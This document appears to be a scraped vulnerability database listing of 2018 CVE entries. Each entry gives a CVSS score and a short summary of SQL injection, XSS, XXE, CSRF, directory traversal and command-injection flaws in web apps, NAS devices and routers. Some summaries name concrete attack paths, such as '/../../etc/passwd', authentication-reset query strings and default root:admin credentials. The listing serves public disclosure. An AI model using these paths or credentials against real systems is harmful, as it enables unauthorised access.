Max CVSS 10.0 Min CVSS 1.9 Total Count7584
IDCVSSSummaryLast (major) updatePublished
CVE-2018-11511 None
The tree list functionality in the photo gallery application in ASUSTOR ADM 3.1.0.RFQ3 has a SQL injection vulnerability that affects the 'album_id' or 'scope' parameter via a photo-gallery/api/album/tree_lists/ URI.
16-08-2018 - 16:29 16-08-2018 - 16:29
CVE-2018-11509 None
ASUSTOR ADM 3.1.0.RFQ3 uses the same default root:admin username and password as it does for the NAS itself for applications that are installed from the online repository. This may allow an attacker to login and upload a webshell.
16-08-2018 - 16:29 16-08-2018 - 16:29
CVE-2018-14922 None
Multiple cross-site scripting (XSS) vulnerabilities in Monstra CMS 3.0.4 allow remote attackers to inject arbitrary web script or HTML via the (1) first name or (2) last name field in the edit profile page.
14-08-2018 - 14:29 14-08-2018 - 14:29
CVE-2018-14888 None
inc/plugins/thankyoulike.php in the Eldenroot Thank You/Like plugin before 3.1.0 for MyBB allows XSS via a post or thread subject.
14-08-2018 - 14:29 14-08-2018 - 14:29
CVE-2018-13417 None
In Vuze Bittorrent Client 5.7.6.0, the XML parsing engine for SSDP/UPnP functionality is vulnerable to an XML External Entity Processing (XXE) attack. Remote, unauthenticated attackers can use this vulnerability to: (1) Access arbitrary files from th
13-08-2018 - 13:29 13-08-2018 - 13:29
CVE-2018-13415 None
In Plex Media Server 1.13.2.5154, the XML parsing engine for SSDP/UPnP functionality is vulnerable to an XML External Entity Processing (XXE) attack. Remote, unauthenticated attackers can use this vulnerability to: (1) Access arbitrary files from the
13-08-2018 - 13:29 13-08-2018 - 13:29
CVE-2018-14869 None
PHP Template Store Script 3.0.6 allows XSS via the Address line 1, Address Line 2, Bank name, or A/C Holder name field in a profile.
07-08-2018 - 21:29 06-08-2018 - 17:29
CVE-2016-8527 None
Aruba Airwave all versions up to, but not including, 8.2.3.1 is vulnerable to a reflected cross-site scripting (XSS). The vulnerability is present in the VisualRF component of AirWave. By exploiting this vulnerability, an attacker who can trick a log
07-08-2018 - 21:29 06-08-2018 - 16:29
CVE-2016-8526 None
Aruba Airwave all versions up to, but not including, 8.2.3.1 is vulnerable to an XML external entities (XXE). XXEs are a way to permit XML parsers to access storage that exist on external systems. If an unprivileged user is permitted to control the c
07-08-2018 - 21:29 06-08-2018 - 16:29
CVE-2018-14912 None
cgit_clone_objects in CGit before 1.2.1 has a directory traversal vulnerability when `enable-http-clone=1` is not turned off, as demonstrated by a cgit/cgit.cgi/git/objects/?path=../ request.
06-08-2018 - 21:29 03-08-2018 - 15:29
CVE-2018-14541 None
PHP Scripts Mall Basic B2B Script 2.0.0 has Reflected and Stored XSS via the First name, Last name, Address 1, City, State, and Company name fields.
05-08-2018 - 21:29 03-08-2018 - 21:29
CVE-2018-14417 None
A command injection vulnerability was found in the web administration console in SoftNAS Cloud before 4.0.3. In particular, the snserv script did not sanitize the 'recentVersion' parameter from the snserv endpoint, allowing an unauthenticated attacke
04-08-2018 - 21:29 03-08-2018 - 21:29
CVE-2018-13416 None
In Universal Media Server (UMS) 7.1.0, the XML parsing engine for SSDP/UPnP functionality is vulnerable to an XML External Entity Processing (XXE) attack. Remote, unauthenticated attackers can use this vulnerability to: (1) Access arbitrary files fro
04-08-2018 - 21:29 03-08-2018 - 13:29
CVE-2018-14840 None
uploads/.htaccess in Subrion CMS 4.2.1 allows XSS because it does not block .html file uploads (but does block, for example, .htm file uploads).
01-08-2018 - 21:29 01-08-2018 - 21:29
CVE-2018-14493 None
Cross-site scripting (XSS) vulnerability in the Groups Page in Open-Audit Community 2.2.6 allows remote attackers to inject arbitrary web script or HTML via the group name.
25-07-2018 - 19:29 25-07-2018 - 19:29
CVE-2018-14335 None
An issue was discovered in H2 1.4.197. Insecure handling of permissions in the backup function allows attackers to read sensitive files (outside of their permissions) via a symlink to a fake database file.
24-07-2018 - 09:29 24-07-2018 - 09:29
CVE-2018-14328 None
Brynamics "Online Trade - Online trading and cryptocurrency investment system" allows remote attackers to obtain sensitive information via a direct request for /dashboard/addplan, /dashboard/paywithcard/charge, /dashboard/withdrawal, or /privacy&term
23-07-2018 - 16:29 23-07-2018 - 16:29
CVE-2018-1513 None
IBM Sterling B2B Integrator Standard Edition 5.2.0 through 5.2.6 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to c
23-07-2018 - 09:29 23-07-2018 - 09:29
CVE-2018-1563 None
IBM Sterling B2B Integrator Standard Edition (IBM Sterling File Gateway 2.2.0 through 2.2.6) is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functional
20-07-2018 - 12:29 20-07-2018 - 12:29
CVE-2018-14418 None
In Msvod Cms v10, SQL Injection exists via an images/lists?cid= URI.
19-07-2018 - 21:29 19-07-2018 - 21:29
CVE-2018-7602 None
A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being compromised. This vulnerability
19-07-2018 - 13:29 19-07-2018 - 13:29
CVE-2018-14392 None
The New Threads plugin before 1.2 for MyBB has XSS.
18-07-2018 - 22:29 18-07-2018 - 22:29
CVE-2018-14082 None
PHP Scripts Mall JOB SITE (aka Job Portal) 3.0.1 has Cross-site Scripting (XSS) via the search bar.
18-07-2018 - 12:29 18-07-2018 - 12:29
CVE-2018-13862 None
Touchpad / Trivum WebTouch Setup V9 V2.53 build 13163 of Apr 6 2018 09:10:14 (FW 303) allow unauthorized remote attackers to reset the authentication via the "/xml/system/setAttribute.xml" URL, using the GET request "?id=0&attr=protectAccess&newValue
17-07-2018 - 10:29 17-07-2018 - 10:29
CVE-2018-13859 None
MusicCenter / Trivum Multiroom Setup Tool V8.76 - SNR 8604.26 - C4 Professional before V9.34 build 13381 - 12.07.18, allow unauthorized remote attackers to reset the authentication via the "/xml/system/setAttribute.xml" URL, using the GET request "?i
17-07-2018 - 10:29 17-07-2018 - 10:29
CVE-2018-0710 None
Command injection vulnerability in SSH of QNAP Q'center Virtual Appliance version 1.7.1063 and earlier could allow authenticated users to run arbitrary commands.
16-07-2018 - 21:29 16-07-2018 - 21:29
CVE-2018-0709 None
Command injection vulnerability in date of QNAP Q'center Virtual Appliance version 1.7.1063 and earlier could allow authenticated users to run arbitrary commands.
16-07-2018 - 21:29 16-07-2018 - 21:29
CVE-2018-0708 None
Command injection vulnerability in networking of QNAP Q'center Virtual Appliance version 1.7.1063 and earlier could allow authenticated users to run arbitrary commands.
16-07-2018 - 21:29 16-07-2018 - 21:29
CVE-2018-0707 None
Command injection vulnerability in change password of QNAP Q'center Virtual Appliance version 1.7.1063 and earlier could allow authenticated users to run arbitrary commands.
16-07-2018 - 21:29 16-07-2018 - 21:29
CVE-2018-0706 None
Exposure of Private Information in QNAP Q'center Virtual Appliance version 1.7.1063 and earlier could allow authenticated users to access sensitive information.
16-07-2018 - 21:29 16-07-2018 - 21:29
CVE-2018-13832 None
Multiple Persistent cross-site scripting (XSS) issues in the Techotronic all-in-one-favicon (aka All In One Favicon) plugin 4.6 for WordPress allow remote attackers to inject arbitrary web script or HTML via Apple-Text, GIF-Text, ICO-Text, PNG-Text,
16-07-2018 - 16:29 16-07-2018 - 16:29
CVE-2018-13981 None
The websites that were built from Zeta Producer Desktop CMS before 14.2.1 are vulnerable to unauthenticated remote code execution due to a default component that permits arbitrary upload of PHP files, because the formmailer widget blocks .php files b
16-07-2018 - 10:29 16-07-2018 - 10:29
CVE-2018-13980 None
The websites that were built from Zeta Producer Desktop CMS before 14.2.1 are vulnerable to unauthenticated file disclosure if the plugin "filebrowser" is installed, because of assets/php/filebrowser/filebrowser.main.php?file=../ directory traversal.
16-07-2018 - 10:29 16-07-2018 - 10:29
CVE-2018-14064 None
The uc-http service 1.0.0 on VelotiSmart WiFi B-380 camera devices allows Directory Traversal, as demonstrated by /../../etc/passwd on TCP port 80.
15-07-2018 - 11:29 15-07-2018 - 11:29
CVE-2018-14029 None
CSRF vulnerability in admin/user/edit in Creatiwity wityCMS 0.6.2 allows an attacker to take over a user account, as demonstrated by modifying the account's email field.
12-07-2018 - 22:29 12-07-2018 - 22:29
CVE-2018-12981 None
An issue was discovered on WAGO e!DISPLAY 762-3000 through 762-3003 devices with firmware before FW 02. The vulnerability can be exploited by authenticated and unauthenticated users by sending special crafted requests to the web server allowing injec
12-07-2018 - 14:29 12-07-2018 - 14:29
CVE-2018-12980 None
An issue was discovered on WAGO e!DISPLAY 762-3000 through 762-3003 devices with firmware before FW 02. The vulnerability allows an authenticated user to upload arbitrary files to the file system with the permissions of the web server.
12-07-2018 - 14:29 12-07-2018 - 14:29
CVE-2018-12979 None
An issue was discovered on WAGO e!DISPLAY 762-3000 through 762-3003 devices with firmware before FW 02. Weak permissions allow an authenticated user to overwrite critical files by abusing the unrestricted file upload in the WBM.
12-07-2018 - 14:29 12-07-2018 - 14:29
CVE-2018-12463 None
An XML external entity (XXE) vulnerability in Fortify Software Security Center (SSC), version 17.1, 17.2, 18.1 allows remote unauthenticated users to read arbitrary files or conduct server-side request forgery (SSRF) attacks via a crafted DTD in an X
12-07-2018 - 12:29 12-07-2018 - 12:29
CVE-2018-13989 None
Grundig Smart Inter@ctive TV 3.0 devices allow CSRF attacks via a POST request to TCP port 8085 containing a predictable ID value, as demonstrated by a /sendrcpackage?keyid=-2544&keysymbol=-4081 request to shut off the device.
11-07-2018 - 12:29 11-07-2018 - 12:29
CVE-2018-13849 None
edit_requests.php in yTakkar Instagram-clone through 2018-04-23 has XSS via an onmouseover payload because of an inadequate XSS protection mechanism based on preg_replace.
10-07-2018 - 14:29 10-07-2018 - 14:29
CVE-2018-13256 None
PHP Scripts Mall Auditor Website 2.0.1 has XSS via the lastname or firstname parameter.
09-07-2018 - 08:29 09-07-2018 - 08:29
CVE-2018-13784 None
PrestaShop before 1.6.1.20 and 1.7.x before 1.7.3.4 mishandles cookie encryption in Cookie.php, Rinjdael.php, and Blowfish.php.
09-07-2018 - 06:29 09-07-2018 - 06:29
CVE-2018-13109 None
All ADB broadband gateways / routers based on the Epicentro platform are affected by an authorization bypass vulnerability where attackers are able to access and manipulate settings within the web interface that are forbidden to end users (e.g., by t
06-07-2018 - 10:29 06-07-2018 - 10:29
CVE-2018-11124 None
Cross-site scripting (XSS) vulnerability in Attributes functionality in Open-AudIT Community edition before 2.2.2 allows remote attackers to inject arbitrary web script or HTML via a crafted attribute name of an Attribute.
06-07-2018 - 10:29 06-07-2018 - 10:29
CVE-2018-8738 None
Airties 5444 1.0.0.18 and 5444TT 1.0.0.18 devices allow XSS.
05-07-2018 - 16:29 05-07-2018 - 16:29
CVE-2018-12739 None
In BEESCMS 4.0, CSRF allows administrators to be added arbitrarily, a related issue to CVE-2018-10266.
05-07-2018 - 16:29 05-07-2018 - 16:29
CVE-2018-12520 None
An issue was discovered in ntopng 3.4 before 3.4.180617. The PRNG involved in the generation of session IDs is not seeded at program startup. This results in deterministic session IDs being allocated for active user sessions. An attacker with forekno
05-07-2018 - 16:29 05-07-2018 - 16:29
CVE-2018-12465 None
An OS command injection vulnerability in the web administration component of Micro Focus Secure Messaging Gateway (SMG) allows a remote attacker authenticated as a privileged user to execute arbitrary OS commands on the SMG server. This can be exploi
29-06-2018 - 12:29 29-06-2018 - 12:29
CVE-2018-12464 None
A SQL injection vulnerability in the web administration and quarantine components of Micro Focus Secure Messaging Gateway allows an unauthenticated remote attacker to execute arbitrary SQL statements against the database. This can be exploited to cre
29-06-2018 - 12:29 29-06-2018 - 12:29
CVE-2018-11510 None
ASUSTOR ADM 3.1.2.RHG1 and earlier uses the same default root:admin username and password as it does for the NAS itself for applications that are installed from the online repository. This may allow an attacker to login and upload a webshell.
28-06-2018 - 10:29 28-06-2018 - 10:29
CVE-2018-12912 None
An issue wan discovered in admin\controllers\database.php in HongCMS 3.0.0. There is a SQL Injection vulnerability via an admin/index.php/database/operate?dbaction=emptytable&tablename= URI.
27-06-2018 - 14:29 27-06-2018 - 14:29
CVE-2018-12908 None
Brynamics "Online Trade - Online trading and cryptocurrency investment system" allows remote attackers to obtain sensitive information via a direct request for the /dashboard/deposit URI, as demonstrated by discovering database credentials.
27-06-2018 - 12:29 27-06-2018 - 12:29
CVE-2018-12603 None
Cross-site request forgery (CSRF) vulnerability in admin.php in LFCMS 3.7.0 allows remote attackers to hijack the authentication of unspecified users for requests that add administrator users via the s parameter, a related issue to CVE-2018-12114.
25-06-2018 - 16:29 25-06-2018 - 16:29
CVE-2018-12602 None
A CSRF vulnerability exists in LFCMS 3.7.0: users can be added arbitrarily.
25-06-2018 - 11:29 25-06-2018 - 11:29
CVE-2018-10956 None
IPConfigure Orchid Core VMS 2.0.5 allows Directory Traversal.
25-06-2018 - 11:29 25-06-2018 - 11:29
CVE-2018-12705 None
DIGISOL DG-BR4000NG devices have XSS via the SSID (it is validated only on the client side).
24-06-2018 - 19:29 24-06-2018 - 19:29
CVE-2018-12636 6.5
The iThemes Security (better-wp-security) plugin before 7.0.3 for WordPress allows SQL Injection (by attackers with Admin privileges) via the logs page.
22-06-2018 - 12:29 22-06-2018 - 12:29
CVE-2018-12613 None
An issue was discovered in phpMyAdmin 4.8.x before 4.8.2, in which an attacker can include (view and potentially execute) files on the server. The vulnerability comes from a portion of code where pages are redirected and loaded within phpMyAdmin, and
21-06-2018 - 16:29 21-06-2018 - 16:29
CVE-2018-12604 5.0
GreenCMS 2.3.0603 allows remote attackers to obtain sensitive information via a direct request for Data/Log/year_month_day.log.
20-06-2018 - 15:29 20-06-2018 - 15:29
CVE-2018-6563 6.8
Multiple cross-site request forgery (CSRF) vulnerabilities in totemomail Encryption Gateway before 6.0.0_Build_371 allow remote attackers to hijack the authentication of users for requests that (1) change user settings, (2) send emails, or (3) change
20-06-2018 - 10:29 20-06-2018 - 10:29
CVE-2018-1132 7.5
A flaw was found in Opendaylight's SDNInterfaceapp (SDNI). Attackers can SQL inject the component's database (SQLite) without authenticating to the controller or SDNInterfaceapp. SDNInterface has been deprecated in OpenDayLight since it was last used
20-06-2018 - 09:29 20-06-2018 - 09:29
CVE-2018-12519 4.0
An issue was discovered in ShopNx through 2017-11-17. The vulnerability allows a remote attacker to upload any malicious file to a Node.js application. An attacker can upload a malicious HTML file that contains a JavaScript payload to steal a user's
19-06-2018 - 17:29 19-06-2018 - 17:29
CVE-2018-11526 6.8
The plugin "WordPress Comments Import & Export" for WordPress (v2.0.4 and before) is vulnerable to CSV Injection.
19-06-2018 - 15:29 19-06-2018 - 15:29
CVE-2018-11525 6.8
The plugin "Advanced Order Export For WooCommerce" for WordPress (v1.5.4 and before) is vulnerable to CSV Injection.
19-06-2018 - 15:29 19-06-2018 - 15:29
CVE-2015-4664 7.5
An improper input validation vulnerability in CA Privileged Access Manager 2.4.4.4 and earlier allows remote attackers to execute arbitrary commands.
18-06-2018 - 14:29 18-06-2018 - 14:29
CVE-2018-12525 5.0
An issue was discovered in perfSONAR Monitoring and Debugging Dashboard (MaDDash) 2.0.2. A direct request to /images/ provides a directory listing.
18-06-2018 - 07:29 18-06-2018 - 07:29
CVE-2018-12524 5.0
An issue was discovered in perfSONAR Monitoring and Debugging Dashboard (MaDDash) 2.0.2. A direct request to /lib/ provides a directory listing.
18-06-2018 - 07:29 18-06-2018 - 07:29
CVE-2018-12523 5.0
An issue was discovered in perfSONAR Monitoring and Debugging Dashboard (MaDDash) 2.0.2. A direct request to /etc/ provides a directory listing.
18-06-2018 - 07:29 18-06-2018 - 07:29
CVE-2018-12522 5.0
An issue was discovered in perfSONAR Monitoring and Debugging Dashboard (MaDDash) 2.0.2. A direct request to /style/ provides a directory listing.
18-06-2018 - 07:29 18-06-2018 - 07:29
CVE-2018-10969 7.5
SQL injection vulnerability in the Pie Register plugin before 3.0.10 for WordPress allows remote attackers to execute arbitrary SQL commands via the invitation codes grid.
17-06-2018 - 12:29 17-06-2018 - 12:29
CVE-2018-5756 4.0
The backend component in Open-Xchange OX App Suite before 7.6.3-rev36, 7.8.x before 7.8.2-rev39, 7.8.3 before 7.8.3-rev44, and 7.8.4 before 7.8.4-rev22 does not properly check for folder-to-object association, which allows remote authenticated users
15-06-2018 - 21:29 15-06-2018 - 21:29
CVE-2018-5755 7.1
Absolute path traversal vulnerability in the readerengine component in Open-Xchange OX App Suite before 7.6.3-rev3, 7.8.x before 7.8.2-rev4, 7.8.3 before 7.8.3-rev5, and 7.8.4 before 7.8.4-rev4 allows remote attackers to read arbitrary files via a fu
15-06-2018 - 21:29 15-06-2018 - 21:29
CVE-2018-5754 3.5
Cross-site scripting (XSS) vulnerability in the office-web component in Open-Xchange OX App Suite before 7.8.3-rev12 and 7.8.4 before 7.8.4-rev9 allows remote attackers to inject arbitrary web script or HTML via a crafted presentation file, related t
15-06-2018 - 21:29 15-06-2018 - 21:29
CVE-2018-5753 4.0
The frontend component in Open-Xchange OX App Suite before 7.6.3-rev31, 7.8.x before 7.8.2-rev31, 7.8.3 before 7.8.3-rev41, and 7.8.4 before 7.8.4-rev20 allows remote attackers to spoof the origin of e-mails via unicode characters in the "personal pa
15-06-2018 - 21:29 15-06-2018 - 21:29
CVE-2018-5752 6.5
The backend component in Open-Xchange OX App Suite before 7.6.3-rev36, 7.8.x before 7.8.2-rev39, 7.8.3 before 7.8.3-rev44, and 7.8.4 before 7.8.4-rev22 allows remote attackers to conduct server-side request forgery (SSRF) attacks via vectors involvin
15-06-2018 - 21:29 15-06-2018 - 21:29
CVE-2018-5751 4.0
The backend component in Open-Xchange OX App Suite before 7.6.3-rev36, 7.8.x before 7.8.2-rev39, 7.8.3 before 7.8.3-rev44, and 7.8.4 before 7.8.4-rev22 allows remote authenticated users to obtain sensitive information about external guest users via v
15-06-2018 - 21:29 15-06-2018 - 21:29
CVE-2017-17062 4.0
The backend component in Open-Xchange OX App Suite before 7.6.3-rev35, 7.8.x before 7.8.2-rev38, 7.8.3 before 7.8.3-rev41, and 7.8.4 before 7.8.4-rev19 allows remote authenticated users to save arbitrary user attributes by leveraging improper privile
15-06-2018 - 21:29 15-06-2018 - 21:29
CVE-2018-12114 6.8
Maccms 10 allows CSRF via admin.php/admin/admin/info.html to add user accounts.
14-06-2018 - 13:29 14-06-2018 - 13:29
CVE-2018-12254 6.5
router.php in the Harmis Ek rishta (aka ek-rishta) 2.10 component for Joomla! allows SQL Injection via the PATH_INFO to a home/requested_user/Sent%20interest/ URI.
12-06-2018 - 13:29 12-06-2018 - 13:29
CVE-2018-12111 4.3
Cross-site scripting (XSS) vulnerability in the Canon PrintMe EFI webinterface allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to the /wt3/mydocs.php URI.
11-06-2018 - 09:29 11-06-2018 - 09:29
CVE-2018-12095 3.5
A Reflected Cross-Site Scripting web vulnerability has been discovered in the OEcms v3.1 web-application. The vulnerability is located in the mod parameter of info.php.
11-06-2018 - 07:29 11-06-2018 - 07:29
CVE-2018-12094 3.5
Cross-site scripting (XSS) vulnerability in news.php in Dimofinf CMS Version 3.0.0 allows remote attackers to inject arbitrary web script or HTML via the id parameter.
11-06-2018 - 07:29 11-06-2018 - 07:29
CVE-2018-12090 4.3
There is unauthenticated reflected cross-site scripting (XSS) in LAMS before 3.1 that allows a remote attacker to introduce arbitrary JavaScript via manipulation of an unsanitized GET parameter during a forgotPasswordChange.jsp?key= password change.
11-06-2018 - 06:29 11-06-2018 - 06:29
CVE-2018-11409 5.0
Splunk through 7.0.1 allows information disclosure by appending __raw/services/server/info/server-info?output_mode=json to a query, as demonstrated by discovering a license key.
08-06-2018 - 08:29 08-06-2018 - 08:29
CVE-2018-10088 10.0
Buffer overflow in XiongMai uc-httpd 1.0.0 has unspecified impact and attack vectors, a different vulnerability than CVE-2017-16725.
08-06-2018 - 08:29 08-06-2018 - 08:29
CVE-2018-12055 7.5
Multiple SQL Injections exist in PHP Scripts Mall Schools Alert Management Script via crafted POST data in contact_us.php, faq.php, about.php, photo_gallery.php, privacy.php, and so on.
08-06-2018 - 07:29 08-06-2018 - 07:29
CVE-2018-12054 5.0
Arbitrary File Read exists in PHP Scripts Mall Schools Alert Management Script via the f parameter in img.php, aka absolute path traversal.
08-06-2018 - 07:29 08-06-2018 - 07:29
CVE-2018-12053 6.4
Arbitrary File Deletion exists in PHP Scripts Mall Schools Alert Management Script via the img parameter in delete_img.php by using directory traversal.
08-06-2018 - 07:29 08-06-2018 - 07:29
CVE-2018-12052 7.5
SQL Injection exists in PHP Scripts Mall Schools Alert Management Script via the q Parameter in get_sec.php.
08-06-2018 - 07:29 08-06-2018 - 07:29
CVE-2018-0296 5.0
A vulnerability in the web interface of the Cisco Adaptive Security Appliance (ASA) could allow an unauthenticated, remote attacker to cause an affected device to reload unexpectedly, resulting in a denial of service (DoS) condition. It is also possi
07-06-2018 - 08:29 07-06-2018 - 08:29
CVE-2018-11586 7.5
XML external entity (XXE) vulnerability in api/rest/status in SearchBlox 8.6.7 allows remote unauthenticated users to read arbitrary files or conduct server-side request forgery (SSRF) attacks via a crafted DTD in an XML request.
05-06-2018 - 17:29 05-06-2018 - 17:29
CVE-2018-11715 3.5
The Recent Threads plugin before 1.1 for MyBB allows XSS via a thread subject.
04-06-2018 - 13:29 04-06-2018 - 13:29
CVE-2018-11564 3.5
Stored XSS in YOOtheme Pagekit 1.0.13 and earlier allows a user to upload malicious code via the picture upload feature. A user with elevated privileges could upload a photo to the system in an SVG format. This file will be uploaded to the system and
01-06-2018 - 21:29 01-06-2018 - 21:29
CVE-2018-11522 4.3
Yosoro 1.0.4 has stored XSS.
01-06-2018 - 21:29 01-06-2018 - 21:29
CVE-2018-11538 6.8
servlet/UserServlet in SearchBlox 8.6.6 has CSRF via the u_name, u_passwd1, u_passwd2, role, and X-XSRF-TOKEN POST parameters because of CSRF Token Bypass.
01-06-2018 - 15:29 01-06-2018 - 15:29
CVE-2018-11671 6.8
An issue was discovered in GreenCMS v2.3.0603. There is a CSRF vulnerability that can add an admin account via index.php?m=admin&c=access&a=adduserhandle.
01-06-2018 - 13:29 01-06-2018 - 13:29
CVE-2018-11670 6.8
An issue was discovered in GreenCMS v2.3.0603. There is a CSRF vulnerability that allows attackers to execute arbitrary PHP code via the content parameter to index.php?m=admin&c=media&a=fileconnect.
01-06-2018 - 13:29 01-06-2018 - 13:29
CVE-2018-11581 3.5
Cross-site scripting (XSS) vulnerability on Brother HL series printers allows remote attackers to inject arbitrary web script or HTML via the url parameter to etc/loginerror.html.
01-06-2018 - 13:29 01-06-2018 - 13:29
CVE-2018-11628 4.3
Data input into EMS Master Calendar before 8.0.0.201805210 via URL parameters is not properly sanitized, allowing malicious attackers to send a crafted URL for XSS.
01-06-2018 - 11:29 01-06-2018 - 11:29
CVE-2018-11535 7.5
An issue was discovered in SITEMAKIN SLAC (Site Login and Access Control) v1.0. The parameter "my_item_search" in users.php is exploitable using SQL injection.
29-05-2018 - 03:29 29-05-2018 - 03:29
CVE-2018-11532 4.3
An issue was discovered in the ChangUonDyU Advanced Statistics plugin 1.0.2 for MyBB. changstats.php has XSS, as demonstrated by a subject field.
29-05-2018 - 03:29 29-05-2018 - 03:29
CVE-2018-11523 7.5
upload.php on NUUO NVRmini 2 devices allows Arbitrary File Upload, such as upload of .php files.
29-05-2018 - 03:29 29-05-2018 - 03:29
CVE-2018-11512 3.5
Stored cross-site scripting (XSS) vulnerability in the "Website's name" field found in the "Settings" page under the "General" menu in Creatiwity wityCMS 0.6.1 allows remote attackers to inject arbitrary web script or HTML via a crafted website name
28-05-2018 - 09:29 28-05-2018 - 09:29
CVE-2018-6411 7.5
An issue was discovered in Appnitro MachForm before 4.2.3. When the form is set to filter a blacklist, it automatically adds dangerous extensions to the filters. If the filter is set to a whitelist, the dangerous extensions can be bypassed through ap
26-05-2018 - 18:29 26-05-2018 - 18:29
CVE-2018-6410 7.5
An issue was discovered in Appnitro MachForm before 4.2.3. There is a download.php SQL injection via the q parameter.
26-05-2018 - 18:29 26-05-2018 - 18:29
CVE-2018-6409 5.0
An issue was discovered in Appnitro MachForm before 4.2.3. The module in charge of serving stored files gets the path from the database. Modifying the name of the file to serve on the corresponding ap_form table leads to a path traversal vulnerabilit
26-05-2018 - 18:29 26-05-2018 - 18:29
CVE-2018-11445 6.8
A CSRF issue was discovered on the User Add/System Settings Page (system-settings-user-new2.php) in EasyService Billing 1.0. A User can be added with the Admin role.
25-05-2018 - 08:29 25-05-2018 - 08:29
CVE-2018-11444 7.5
A SQL Injection issue was observed in the parameter "q" in jobcard-ongoing.php in EasyService Billing 1.0.
25-05-2018 - 08:29 25-05-2018 - 08:29
CVE-2018-11443 4.3
The parameter q is affected by Cross-site Scripting in jobcard-ongoing.php in EasyService Billing 1.0.
25-05-2018 - 08:29 25-05-2018 - 08:29
CVE-2018-11442 6.8
A CSRF issue was discovered in EasyService Billing 1.0, which was triggered via a quotation-new3-new2.php?add=true&id= URI, as demonstrated by adding a new quotation.
25-05-2018 - 08:29 25-05-2018 - 08:29
CVE-2018-11415 4.3
SAP Internet Transaction Server (ITS) 6200.X.X has Reflected Cross Site Scripting (XSS) via certain wgate URIs. NOTE: the vendor has reportedly indicated that there will not be any further releases of this product.
24-05-2018 - 15:29 24-05-2018 - 15:29
CVE-2018-11332 3.5
Stored cross-site scripting (XSS) vulnerability in the "Site Name" field found in the "site" tab under configurations in ClipperCMS 1.3.3 allows remote attackers to inject arbitrary web script or HTML via a crafted site name to the manager/processors
24-05-2018 - 12:29 24-05-2018 - 12:29
CVE-2018-11404 4.3
DomainMod v4.09.03 has XSS via the assets/edit/ssl-provider-account.php sslpaid parameter.
24-05-2018 - 03:29 24-05-2018 - 03:29
CVE-2018-11403 3.5
DomainMod v4.09.03 has XSS via the assets/edit/account-owner.php oid parameter.
24-05-2018 - 03:29 24-05-2018 - 03:29
CVE-2018-8898 7.5
A flaw in the authentication mechanism in the Login Panel of router D-Link DSL-3782 (A1_WI_20170303 || SWVer="V100R001B012" FWVer="3.10.0.24" FirmVer="TT_77616E6771696F6E67") allows unauthenticated attackers to perform arbitrary modification (read, w
23-05-2018 - 12:29 23-05-2018 - 12:29
CVE-2018-10094 7.5
SQL injection vulnerability in Dolibarr before 7.0.2 allows remote attackers to execute arbitrary SQL commands via vectors involving integer parameters without quotes.
22-05-2018 - 16:29 22-05-2018 - 16:29
CVE-2018-11339 4.3
An XSS issue was discovered in Frappe ERPNext v11.x.x-develop b1036e5 via a comment.
21-05-2018 - 21:29 21-05-2018 - 21:29
CVE-2018-11096 4.3
Horse Market Sell & Rent Portal Script 1.5.7 has a CSRF vulnerability through which an attacker can change all of the target's account information remotely.
21-05-2018 - 10:29 21-05-2018 - 10:29
CVE-2018-11092 5.8
An issue was discovered in the Admin Notes plugin 1.1 for MyBB. CSRF allows an attacker to remotely delete all admin notes via an admin/index.php?empty=table (aka Clear Table) action.
21-05-2018 - 10:29 21-05-2018 - 10:29
CVE-2018-11094 10.0
An issue was discovered on Intelbras NCLOUD 300 1.0 devices. /cgi-bin/ExportSettings.sh, /goform/updateWPS, /goform/RebootSystem, and /goform/vpnBasicSettings do not require authentication. For example, when an HTTP POST request is made to /cgi-bin/E
15-05-2018 - 15:29 15-05-2018 - 15:29
CVE-2018-6023 6.8
Fastweb FASTgate 0.00.47 devices are vulnerable to CSRF, with impacts including Wi-Fi password changing, Guest Wi-Fi activating, etc.
11-05-2018 - 17:29 11-05-2018 - 17:29
CVE-2018-10832 4.3
ModbusPal 1.6b is vulnerable to an XML External Entity (XXE) attack. Projects are saved as .xmpp files and automations can be exported as .xmpa files, both XML-based, which are vulnerable to XXE injection. Sending a crafted .xmpp or .xmpa file to a u
11-05-2018 - 17:29 11-05-2018 - 17:29
CVE-2018-10580 3.5
The "Latest Posts on Profile" plugin 1.1 for MyBB has XSS because there is an added section in a user profile that displays that user's most recent posts without sanitizing the tsubject (aka thread subject) field.
11-05-2018 - 10:29 11-05-2018 - 10:29
CVE-2018-10314 3.5
Cross-site scripting (XSS) vulnerability in Open-AudIT Community 2.2.0 allows remote attackers to inject arbitrary web script or HTML via a crafted name of a component, as demonstrated by the action parameter in the Discover -> Audit Scripts -> List
09-05-2018 - 23:29 09-05-2018 - 23:29
CVE-2015-1503 7.8
Multiple directory traversal vulnerabilities in IceWarp Mail Server before 11.2 allow remote attackers to read arbitrary files via a (1) .. (dot dot) in the file parameter to a webmail/client/skins/default/css/css.php page or .../. (dot dot dot slash
08-05-2018 - 16:29 08-05-2018 - 16:29
CVE-2018-1247 5.8
RSA Authentication Manager Security Console, version 8.3 and earlier, contains a XML External Entity (XXE) vulnerability. This could potentially allow admin users to cause a denial of service or extract server data via injecting a maliciously crafted
08-05-2018 - 09:29 08-05-2018 - 09:29
CVE-2018-10757 7.5
CSP MySQL User Manager 2.3.1 allows SQL injection, and resultant Authentication Bypass, via a crafted username during a login attempt.
05-05-2018 - 15:29 05-05-2018 - 15:29
CVE-2018-9302 6.4
SSRF (Server Side Request Forgery) in /assets/lib/fuc.js.php in Cockpit 0.4.4 through 0.5.5 allows remote attackers to read arbitrary files or send TCP traffic to intranet hosts via the url parameter. NOTE: this vulnerability exists because of an inc
02-05-2018 - 11:29 02-05-2018 - 11:29
CVE-2018-10260 6.5
A Local File Inclusion vulnerability was found in HRSALE The Ultimate HRM v1.0.2, exploitable by a low privileged user.
01-05-2018 - 15:29 01-05-2018 - 15:29
CVE-2018-10259 3.5
An Authenticated Stored XSS vulnerability was found in HRSALE The Ultimate HRM v1.0.2, exploitable by a low privileged user.
01-05-2018 - 15:29 01-05-2018 - 15:29
CVE-2018-10258 6.5
A CSV Injection vulnerability was discovered in Shopy Point of Sale v1.0 that allows a user with low level privileges to inject a command that will be included in the exported CSV file, leading to possible code execution.
01-05-2018 - 15:29 01-05-2018 - 15:29
